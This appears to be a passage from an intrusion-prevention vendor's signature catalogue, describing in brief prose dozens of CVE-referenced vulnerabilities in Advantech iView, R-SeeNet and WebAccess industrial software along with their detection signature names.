Advantech-Iview-Runproviewupgrade-Handling-Remote-Command-Injection

About this vulnerability: A vulnerability in Advantech iView
Risk: High
First detected in: sgpkg-ips-1359-5242
Last changed: sgpkg-ips-1359-5242
Platform: Generic
Software: Advantech iView
Type: Malfunction
Description: A remote command execution has been reported in Advantech iView. The vulnerability is due to improper input sanitization. A remote user could exploit the vulnerability by sending a crafted request to the server. Successful exploitation can result in execution of arbitrary code in the context of System user.
Situation: HTTP_CRL-Advantech-Iview-Runproviewupgrade-Handling-Remote-Command-Injection
References:
CVE-2021-32930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32930
Back to top

Advantech-Iview-Setdeviceauthentication-SQL-Injection

About this vulnerability: A vulnerability in Advantech iView
Risk: Moderate
First detected in: sgpkg-ips-1374-5242
Last changed: sgpkg-ips-1374-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: A SQL injection vulnerability exists in Advantech iView. The vulnerability is due to improper validation of user-supplied input when processing the request in setDeviceAuthentication method of the NetworkServlet Java class. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of arbitrary SQL statements, which may cause disclosure of sensitive information or authentication bypass, leading to further compromises.
Situation: HTTP_CRL-Advantech-Iview-Setdeviceauthentication-SQL-Injection
References:
CVE-2021-32932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32932
Back to top

Advantech-Iview-Set_Useraccount-Username-SQL-Injection

About this vulnerability: A vulnerability in Advantech iView
Risk: Moderate
First detected in: sgpkg-ips-1496-5242
Last changed: sgpkg-ips-1496-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: Improper input validation for the UserName parameter in the set_useraccount process causes an SQL injection vulnerability in Advantech iView. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Advantech-Iview-Set_Useraccount-Username-SQL-Injection
References:
CVE-2022-2136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2136
Back to top

Advantech-Iview-Updatepromfile-Ipaddress-SQL-Injection

About this vulnerability: A vulnerability in Advantech iView
Risk: Moderate
First detected in: sgpkg-ips-1487-5242
Last changed: sgpkg-ips-1487-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: Improper input validation for the ipaddress parameter during the updatePROMFile process causes an SQL injection vulnerability in Advantech iView. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Advantech-Iview-Updatepromfile-Ipaddress-SQL-Injection
References:
CVE-2022-2136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2136
Back to top

Advantech-Iview-Updatesegmentinfo-Id-SQL-Injection

About this vulnerability: A vulnerability in Advantech iView
Risk: High
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1486-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: An SQL injection vulnerability has been reported for Advantech iView. This vulnerability is due to improper input validation for the ID parameter in the updateSegmentInfo process. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.
Situation: HTTP_CRL-Advantech-Iview-Updatesegmentinfo-Id-SQL-Injection
References:
CVE-2022-2135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2135
Back to top

Advantech-Iview-UserServlet-SQL-Injection

About this vulnerability: A vulnerability in Advantech iView
Risk: High
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: There exists a vulnerability in Advantech iView, versions prior to 5.7.03.6112, which allows remote attackers to execute arbitrary code due to the insufficient validation of user supplied input when processing the request in UserServlet Java class.
Situation: HTTP_CRL-Advantech-Iview-UserServlet-SQL-Injection
References:
CVE-2021-22658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22658
Back to top

Advantech-Iview-Ztpconfigtable-SQL-Injection

About this vulnerability: A vulnerability in Advantech iView
Risk: High
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: A SQL injection vulnerability exists in the Advantech iView. The vulnerability is due to improper validation of user-supplied input when processing the request in ZTPConfigTable Java class. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of arbitrary SQL statements, which may cause disclosure of sensitive information, authentication bypass or disclosure of sensitive information, leading to further compromises.
Situation: HTTP_CRL-Advantech-Iview-Ztpconfigtable-SQL-Injection
References:
CVE-2021-22654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22654
Back to top

Advantech-r-Seenet-Device_Graph_Page-Cross-Site-Scripting

About this vulnerability: A vulnerability in Advantech R-SeeNet
Risk: Moderate
First detected in: sgpkg-ips-1373-5242
Last changed: sgpkg-ips-1373-5242
Platform: Generic
Software: Advantech R-SeeNet
Type: Input Validation
Description: Improper validation of user-sent input in device_graph_page.php causes a cross-site scripting vulnerability in Advantech R-SeeNet. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Advantech-r-Seenet-Device_Graph_Page-Cross-Site-Scripting
References:
CVE-2021-21801
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21801
Back to top

Advantech-r-Seenet-Device_List-SQL-Injection

About this vulnerability: A vulnerability in Advantech R-SeeNet
Risk: Moderate
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1412-5242
Platform: Generic
Software: Advantech R-SeeNet
Type: Input Validation
Description: Improper input validation of the 'desc_filter' parameter in device_list.php in Advantech R-SeeNet allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Advantech-r-Seenet-Device_List-SQL-Injection
References:
CVE-2021-21924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21924
Back to top

Advantech-r-Seenet-Device_Position-Device_Id-SQL-Injection

About this vulnerability: A vulnerability in Advantech R-SeeNet
Risk: High
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Platform: Generic
Software: Advantech R-SeeNet
Type: Input Validation
Description: A SQL injection vulnerability has been reported in Advantech R-SeeNet. The vulnerability is due to insufficient validation on the device_id parameter within device_position.php. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target system. Successful exploitation results in disclosing sensitive information.
Situation: HTTP_CRL-Advantech-r-Seenet-Device_Position-Device_Id-SQL-Injection
References:
CVE-2020-25157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25157
Back to top

Advantech-R-Seenet-Device_status.php-Local-File-Inclusion

About this vulnerability: A vulnerability in Advantech R-SeeNet
Risk: Moderate
First detected in: sgpkg-ips-1634-5242
Last changed: sgpkg-ips-1634-5242
Platform: Generic
Software: Advantech R-SeeNet
Type: Input Validation
Description: A local file inclusion vulnerability has been reported for Advantech R-SeeNet. The vulnerability is due to improper validation of the sub_stat parameter in the device_status.php. A remote authenticated attacker could exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could allow a user to access some .php files which are normally restricted from the user. This could lead to privilege escalation and possible further compromises.
Situation: HTTP_CRL-Advantech-R-Seenet-Device_status.php-Local-File-Inclusion
References:
CVE-2023-3256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3256
Back to top

Advantech-r-Seenet-Out.PHP-Directory-Traversal

About this vulnerability: A vulnerability in Advantech R-SeeNet
Risk: Moderate
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Platform: Generic
Software: Advantech R-SeeNet
Type: Directory Traversal
Description: Improper validation of input data causes a directory traversal vulnerability in out.php in Advantech R-SeeNet. A successful exploit allows an attacker to access and delete files on the target system.
Situation: HTTP_CRL-Advantech-r-Seenet-Out.PHP-Directory-Traversal
References:
CVE-2022-3387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3387
Back to top

Advantech-r-Seenet-Ping.PHP-Command-Injection

About this vulnerability: A vulnerability in Advantech R-SeeNet
Risk: Moderate
First detected in: sgpkg-ips-1375-5242
Last changed: sgpkg-ips-1375-5242
Platform: Generic
Software: Advantech R-SeeNet
Type: Input Validation
Description: Improper validation of the input to ping.php causes a vulnerability in Advantech R-SeeNet. A successful exploit allows an attacker to execute arbitrary code on the target with the privileges of the target process.
Situation: HTTP_CRL-Advantech-r-Seenet-Ping.PHP-Command-Injection
References:
CVE-2021-21805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805
Back to top

Advantech-r-Seenet-SSH_Form-Cross-Site-Scripting

About this vulnerability: A vulnerability in Advantech R-SeeNet
Risk: Moderate
First detected in: sgpkg-ips-1382-5242
Last changed: sgpkg-ips-1382-5242
Platform: Generic
Software: Advantech R-SeeNet
Type: Input Validation
Description: Improper input validation in ssh_form.php causes a cross-site scripting vulnerability in Advantech R-SeeNet. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Advantech-r-Seenet-SSH_Form-Cross-Site-Scripting
References:
CVE-2021-21800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21800
Back to top

Advantech-r-Seenet-Telnet_Form-Cross-Site-Scripting

About this vulnerability: A vulnerability in Advantech R-SeeNet
Risk: Moderate
First detected in: sgpkg-ips-1386-5242
Last changed: sgpkg-ips-1386-5242
Platform: Generic
Software: Advantech R-SeeNet
Type: Input Validation
Description: Improper input validation in telnet_form.php causes a cross-site scripting vulnerability in Advantech r-Seenet. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Advantech-r-Seenet-Telnet_Form-Cross-Site-Scripting
References:
CVE-2021-21799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21799
Back to top

Advantech-Studio-ISSymbol-ActiveX-Control-Multiple-Buffer-Overflows

About this vulnerability: A vulnerability in Advantech Studio
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech Studio
Type: Malfunction
Description: There are multiple buffer overflow vulnerabilities the ISSYmbol.ocx ActiveX control in Advantech Studio which allows remote attacker to execute arbitrary code.
Situation: File-Text_Advantech-Studio-ISSymbol-ActiveX-Control-Buffer-Overflow
References:
CVE-2011-0340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0340
BID-47596
http://www.securityfocus.com/bid/47596
Back to top

Advantech-WebAccess-ActiveX-Convtosafearray-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in Advantech's WebAccess SCADA software. A successful exploitation could result in code execution in the security context of the target user.
Situation: File-TextId_Advantech-WebAccess-ActiveX-Convtosafearray-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-ActiveX-Convtosafearray-Stack-Buffer-Overflow
References:
CVE-2014-9208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9208
Back to top

Advantech-WebAccess-Aspvcobj-ActiveX-Fileprocess-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in Advantech's WebAccess SCADA software. A successful exploitation could lead to code execution.
Situation: File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Fileprocess-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Fileprocess-Stack-Buffer-Overflow
References:
CVE-2014-9208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9208
Back to top

Advantech-WebAccess-Aspvcobj-ActiveX-Getlasttagnbr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in Advantech's WebAccess SCADA software. An unauthenticated attacker can remotely exploit this vulnerability, which can lead to code execution in the context of the target user.
Situation: File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Getlasttagnbr-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Getlasttagnbr-Stack-Buffer-Overflow
References:
CVE-2014-9208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9208
Back to top

Advantech-WebAccess-Aspvcobj-ActiveX-Getwidestrcpy-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in Advantech's WebAccess SCADA software. A remote attacker can use this to accieve code execution in the security context of the target user.
Situation: File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Getwidestrcpy-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Getwidestrcpy-Stack-Buffer-Overflow
References:
CVE-2014-9208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9208
Back to top

Advantech-WebAccess-Aspvcobj-ActiveX-Interfacefilter-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Advantech's WebAccess SCADA software. The vulnerability is due to insufficient input validation of InterfaceFilter's argument in the AspVCObj ActiveX control. A remote, unauthenticated attacker can exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation can lead to code execution in the context of the target user.
Situation: File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Interfacefilter-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Interfacefilter-Stack-Buffer-Overflow
References:
CVE-2014-9208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9208
Back to top

Advantech-WebAccess-Aspvcobj.aspdatadriven-ActiveX-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-689-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in Advantech's WebAccess SCADA software. A successful exploitation could lead to code execution.
Situation: File-TextId_Advantech-WebAccess-Aspvcobj.aspdatadriven-ActiveX-Getrecipeinfo-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj.aspdatadriven-ActiveX-Getrecipeinfo-Stack-Buffer-Overflow
References:
CVE-2014-9208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9208
Back to top

Advantech-WebAccess-Blind-SQL-Injection

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Malfunction
Description: There is an SQL injection vulnerability in Advantech WebAccess which allows an attacker to retrieve information such as administrator's credentials.
Situation: HTTP_CRL-Advantech-WebAccess-Blind-SQL-Injection
Back to top

Advantech-WebAccess-Bwpfile-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-1291-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Advantech WebAccess, versions 9.0.0 prior to 9.0.0.P0320900, which allows remote attackers to delete arbitrary files on the target system, due to the insufficient validation of the BwPFile component.
Situation: MSRPC-TCP_Advantech-WebAccess-Bwpfile-Stack-Based-Buffer-Overflow
References:
CVE-2020-16215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16215
Back to top

Advantech-WebAccess-Bwrpswd.exe-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Bwrpswd.exe-Stack-Based-Buffer-Overflow
References:
CVE-2019-6550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6550
Back to top

Advantech-WebAccess-Dashboard-Openwidget-Directory-Traversal

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: Multiple directory traversal vulnerabilities in the request parsing routines of Advantech WebAccess may result in an attacker gaining the ablity to download arbitrary files.
Situation: HTTP_CRL-Advantech-WebAccess-Dashboard-Openwidget-Directory-Traversal
References:
CVE-2016-0855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0855
Back to top

Advantech-WebAccess-Dashboard-Removefile-Directory-Traversal

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: A directory traversal vulnerability in the request parsing routines of Advantech WebAccess may result in denial of service or data corruption when exploited.
Situation: HTTP_CRL-Advantech-WebAccess-Dashboard-Multiple-Directory-Traversal-Vulnerabilities
References:
CVE-2016-0855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0855
Back to top

Advantech-WebAccess-Dashboard-removeFolder-Directory-Traversal

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-743-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in the Dashboard component of Advantech WebAccess. A remote attacker can use this to acchieve a denial-of-service condition.
Situation: HTTP_CRL-Advantech-WebAccess-Dashboard-Multiple-Directory-Traversal-Vulnerabilities
References:
CVE-2016-0855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0855
Back to top

Advantech-WebAccess-Dashboard-Uploadimagecommon-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: Arbitrary code can be executed by exploiting a file upload vulnerability resulting from insufficient input validation in the uploadImageCommon() method in the UploadAjaxAction script.
Situation: HTTP_CS-Advantech-WebAccess-Dashboard-Uploadimagecommon-Arbitrary-File-Upload
References:
CVE-2016-0854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0854
Back to top

Advantech-WebAccess-Datacore-Service-Function-0x5228-Strcpy-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: An improper boundary check in the RPC interface of Advantech WebAccess results in a vulnerability which can be exploited to gain System-privileged code execution on the target host.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Datacore-Service-Function-0x5228-Strcpy-Heap-Buffer-Overflow
References:
CVE-2016-0857
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0857
Back to top

Advantech-WebAccess-Datacore-Service-Function-0x523a-Strcpy-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-751-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Arbirtrary code can be executed by an attacker by sending a crafted MSPC request to the affected server. The vulnerability results from the server not validating the input to the 0x523a function.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Datacore-Service-Function-0x523a-Strcpy-Buffer-Overflow
References:
CVE-2016-0856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0856
Back to top

Advantech-WebAccess-Directory-Traversal

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Malfunction
Description: There is an absolute path traversal vulnerability in Advantech WebAccess which can allow remote attackers to read arbitrary files. Advantech WebAccess is a browser-based HMI / SCADA software.
Situation: HTTP_CSU-System-File-Disclosure
References:
CVE-2013-1627
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1627
Back to top

Advantech-WebAccess-HMI-And-SCADA-Software-Cross-Site-Scripting

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: A cross site scripting vulnerability has been reported in Advantech WebAccess HMI/SCADA software. The vulnerability is due to improper validation of input passed via the 'ProjDesc' parameter. A remote attacker can exploit this vulnerability to execute arbitrary HTML and script code in a browser session in the context of the vulnerable site.
Situation: HTTP_CRL-Advantech-WebAccess-HMI-And-SCADA-Software-Cross-Site-Scripting
References:
BID-57178
http://www.securityfocus.com/bid/57178
OSVDB-89067
http://www.osvdb.org/89067
Back to top

Advantech-WebAccess-HMI-Designer-Pm3-Nanimatedgraphic-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess HMI Designer
Risk: Moderate
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1396-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A heap-based buffer overflow vulnerability has been reported in the project management file parsing component of Advantech WebAccess HMI Designer. The vulnerability is due to lack of validation while processing user-supplied NAnimatedGraphic object data. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted PM3 file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.
Situation: File-OLE_Advantech-WebAccess-HMI-Designer-Pm3-Nanimatedgraphic-Heap-Buffer-Overflow
References:
CVE-2021-33000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33000
Back to top

Advantech-WebAccess-HMI-Designer-Pm3-Nhtrendgraph-Memory-Corruption

About this vulnerability: A vulnerability in Advantech WebAccess HMI Designer
Risk: Moderate
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Platform: Generic
Software: Advantech WebAccess
Type: Malfunction
Description: Improper processing of user-supplied NHTrendGraph object data causes a memory corruption vulnerability in Advantech WebAccess HMI Designer. A successful attack can allow code to be executed with the privileges of the affected user.
Situation: File-OLE_Advantech-WebAccess-HMI-Designer-Pm3-Nhtrendgraph-Memory-Corruption
References:
CVE-2021-33004
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33004
Back to top

Advantech-WebAccess-HMI-Designer-Pm3-Nmultistatelamp-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess HMI Designer
Risk: Moderate
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper validation of user supplied NMultistateLamp object data in files causes a heap buffer overflow vulnerability in Advantech WebAccess HMI designer. A successful attack can result in code execution on the target system.
Situation: File-OLE_Advantech-WebAccess-HMI-Designer-Pm3-Nmultistatelamp-Heap-Buffer-Overflow
References:
CVE-2021-33000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33000
Back to top

Advantech-WebAccess-IOCTL-0x1138b-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1437-5242
Last changed: sgpkg-ips-1437-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes an buffer overflow vulnerability in Advantech WebAccess. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-IOCTL-0x1138b-Stack-Based-Buffer-Overflow
References:
CVE-2021-38389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38389
Back to top

Advantech-WebAccess-IOCTL-10001-Bwflapp-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1398-5242
Last changed: sgpkg-ips-1398-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes an integer overflow vulnerability in Advantech WebAccess. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-IOCTL-10001-Bwflapp-Stack-Based-Buffer-Overflow
References:
CVE-2021-38408
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38408
Back to top

Advantech-WebAccess-IOCTL-10001-Bwfrerpt-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1397-5242
Last changed: sgpkg-ips-1397-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes an integer overflow vulnerability in Advantech WebAccess. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-IOCTL-10001-Bwfrerpt-Stack-Buffer-Overflow
Back to top

Advantech-WebAccess-IOCTL-10001-Bwimgexe-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes an integer overflow vulnerability in Advantech WebAccess. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-IOCTL-10001-Bwimgexe-Stack-Based-Buffer-Overflow
Back to top

Advantech-WebAccess-Multiple-ActiveX-Vulnerabilities

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Malfunction
Description: There are multiple ActiveX control vulnerabilities in Advantech WebAccess which may allow remote code execution.
Situation: File-Text_Advantech-WebAccess-Webeyeaudio.ocx-ActiveX-Buffer-Overflow
File-Text_Advantech-WebAccess-NVLive.ocx-ActiveX-Buffer-Overflow
File-Text_Advantech-WebAccess-Epoch-Making.dll-ActiveX-Buffer-Overflow
File-Text_Advantech-WebAccess-Dvs.ocx-ActiveX-Buffer-Overflow
File-Text_Advantech-WebAccess-CellVision.ocx-ActiveX-Buffer-Overflow
Back to top

Advantech-WebAccess-NMS-Configrestoreaction-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1272-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: An arbitrary file upload vulnerability has been reported in Advantech WebAccess NMS. The vulnerability is due to insufficient input validation on file paths in the ConfigRestoreAction servlet. A remote, unauthenticated attacker can exploit this vulnerability by submitting a crafted request to the target server. Successful exploitation could lead to arbitrary code execution under the security context of the SYSTEM.
Situation: HTTP_CS-Advantech-WebAccess-NMS-Configrestoreaction-Arbitrary-File-Upload
References:
CVE-2020-10621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10621
Back to top

Advantech-WebAccess-NMS-Dbbackuprestoreaction-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1279-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: Improper validation of file paths in the DBBackupRestoreAction servlet causes a file upload vulnerability in Advantech WebAccess. A successful exploit allows an attacker to overwrite files that will be executed with system privileges.
Situation: HTTP_CS-Advantech-WebAccess-NMS-Dbbackuprestoreaction-Arbitrary-File-Upload
File-Member-Name_Advantech-WebAccess-NMS-Dbbackuprestoreaction-Arbitrary-File-Upload
References:
CVE-2020-10621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10621
Back to top

Advantech-WebAccess-NMS-Download.jsp-Arbitrary-Directory-Traversal

About this vulnerability: A vulnerability in Advantech WebAccess/NMS
Risk: High
First detected in: sgpkg-ips-1283-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Advantech WebAccess NMS. The vulnerability is due to insufficient input validation on file paths while processing the calls to download.jsp endpoint. A remote, unauthenticated attacker can exploit this vulnerability by submitting a crafted request to the target server. Successful exploitation could delete or read arbitrary files on the target server under the security context of the SYSTEM.
Situation: HTTP_CRL-Advantech-WebAccess-NMS-Download.jsp-Arbitrary-Directory-Traversal
References:
CVE-2020-10631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10631
Back to top

Advantech-WebAccess-NMS-Downloadaction-Directory-Traversal

About this vulnerability: A vulnerability in Advantech WebAccess/NMS
Risk: Moderate
